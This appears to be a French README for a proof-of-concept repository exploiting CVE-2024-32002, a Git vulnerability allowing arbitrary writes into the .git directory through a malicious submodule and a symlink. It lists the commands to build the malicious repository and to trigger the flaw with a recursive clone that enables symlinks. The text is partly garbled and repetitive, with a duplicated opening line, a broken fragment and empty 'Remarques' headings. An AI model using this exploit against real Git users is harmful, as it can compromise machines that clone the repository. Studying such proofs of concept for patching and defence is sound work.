
Un POC pour CVE-2024-32002 démontrant une écriture arbitraire dans le répertoire .git.
Un POC pour CVE-2024-32002 démontrant une écriture arbitraire dans le répertoire .git.
Voir cve-2024-32002-submodule-aw pour le dépôt de sous-module associé.
.git..gitmodules qui définit le sous-module malveillant.Ce dépôt a été créé sous Linux (WSL2, pour être précis). C'est important : le dépôt malveillant ne peut être créé que sur un système de fichiers sensible à la casse.
ln -s .git submodule
Remarques :
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists
Remarques :
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git